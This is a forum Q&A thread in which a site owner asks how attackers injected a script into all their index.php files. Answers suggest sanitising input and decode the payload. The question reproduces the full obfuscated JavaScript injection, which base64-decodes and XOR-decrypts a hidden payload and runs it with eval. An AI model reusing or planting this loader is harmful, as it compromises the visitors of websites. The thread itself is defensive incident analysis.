All my index.php files on my website got hacked

Question

All index.php files on my website got hacked with the code injection in the body tag, see below. Does anyone know how they did it and if there is way to look for it how prevent it?

echo "<body><script language="javascript">try { function BwrLMVnkPmRbZYpfwLH(MLJOynjaY){var iMgpLZHO="",aVwbJg,oKONbIZB,gdGJUWTs,siAOty,hPaiwMZ,NxynbqCA,VxXqcPIGHh,UclXTRxDsh,bRLAlhars;var nGBCFoc="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var OZymdhDIRb="";for(UclXTRxDsh=0;UclXTRxDsh<MLJOynjaY.length;){siAOty=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));hPaiwMZ=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));bRLAlhars=BwrLMVnkPmRbZYpfwLH;NxynbqCA=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));VxXqcPIGHh=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));aVwbJg=(siAOty<<2)+(hPaiwMZ>>4);oKONbIZB=((hPaiwMZ&15)<<4)+(NxynbqCA>>2);gdGJUWTs=((NxynbqCA&3)<<6)+VxXqcPIGHh;bRLAlhars=bRLAlhars.toString();iMgpLZHO+=String.fromCharCode(aVwbJg);if(NxynbqCA!=64)iMgpLZHO+=String.fromCharCode(oKONbIZB);if(VxXqcPIGHh!=64)iMgpLZHO+=String.fromCharCode(gdGJUWTs);}bRLAlhars=bRLAlhars.replace(/\W/g,"");bRLAlhars=bRLAlhars.split("").reverse().join("");for(UclXTRxDsh=0;UclXTRxDsh<iMgpLZHO.length;UclXTRxDsh++)OZymdhDIRb+=String.fromCharCode(iMgpLZHO.charCodeAt(UclXTRxDsh%iMgpLZHO.length)^bRLAlhars.charCodeAt(UclXTRxDsh%bRLAlhars.length));return eval(OZymdhDIRb);}BwrLMVnkPmRbZYpfwLH("QnJpZEhETVl6b0xBVmxnBBQGRRsOBgYDAExOUgUHDzQhNwwcXScKNzUsCSY5ESwAChtrUAgOERIfBEpFekZbawESFQ8ICWE/MygED21USFF1WmleUWUKMwYgCAFBKxcIDws7aGdsUlZvUm9tZioUEwkuCEEBFAROVFJWOxYmOX5HSxVULyEBEGobPTl3BQ17CxMOUVdOdEJTRRQILhwFFioMfDY3CBp7URgDIRY2FzAFDzFaBgAcCAIPTEg=");} catch(e){}</script>";*

Answer 1

I would suggest you to use HTML Purifier.

HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited,
secure yet permissive whitelist, it will also make sure your documents are standards compliant

Also, use mysql_real_escape_string function before any values you want to insert/update into the database, and use intval before the numbers to minimize the risk.

Answer 2

The javascript decodes and evals the following binary string:

0000: 2935 3f1e 1070 7a63 286e 6d69 626b 742b  )5?..pzc(nmibkt+
0010: 2037 6974 7d55 495b 4d50 0f45 6244 7154   7it}UI[MP.EbDqT
0020: 5b72 617d 4f55 7e5a 0e34 674d 6373 7767  [ra}OU~Z.4gMcswg
0030: 3937 1b2e 372a 4d40 7767 7c6e 0f5a 5f67  97..7*M@wg|n.Z_g
0040: 4c55 2124 2f1c 1c32 1a1a 2937 5e6b 6a43  LU!$/..2..)7^kjC
0050: 5d75 efbf bd4e 7367 4c79 5aef bfbd 0423  ]u...NsgLyZ....#
0060: 1a0c 2322 0820 0f4f 707c 4a5c 6929 4279  ..#". .Op|J\i)By
0070: 6b26 6c74 3b32 3538 5264 526a 1c15 0251  k<258RdRj...Q
0080: 3c6b 6c78 6a25 736e 7d0f 7779 2367 705b  <klxj%sn}.wy#gp[
0090: 3923 291a 273f 205c 7262 6c62 5b63 640f  9#).'? \rblb[cd.
00a0: 726f 7a6e 233d 227b 5611 7e45 5348 575b  rozn#="{V.~ESHW[
00b0: 6936 6555 6e67 6461 2527 223e 3c2f 6b6c  i6eUngda%'"></kl
00c0: 786a 2573 6e7d 0f77 7923 6770 5b39 2329  xj%sn}.wy#gp[9#)
00d0: 1a27 3f3e                                .'?>

which seems a bit pointless as most javascript engines should just throw a syntax error. Perhaps it causes an overflow in some browser.

As to how they actually did it, the code you posted is exploiting a client-side bug, and they probably compromised your server with an unrelated attack. It will depend how your content is generated but an SQL injection or filesystem overwrite are possible. Do you do anything like eval unescaped SQL or run dynamic exec-family functions from PHP?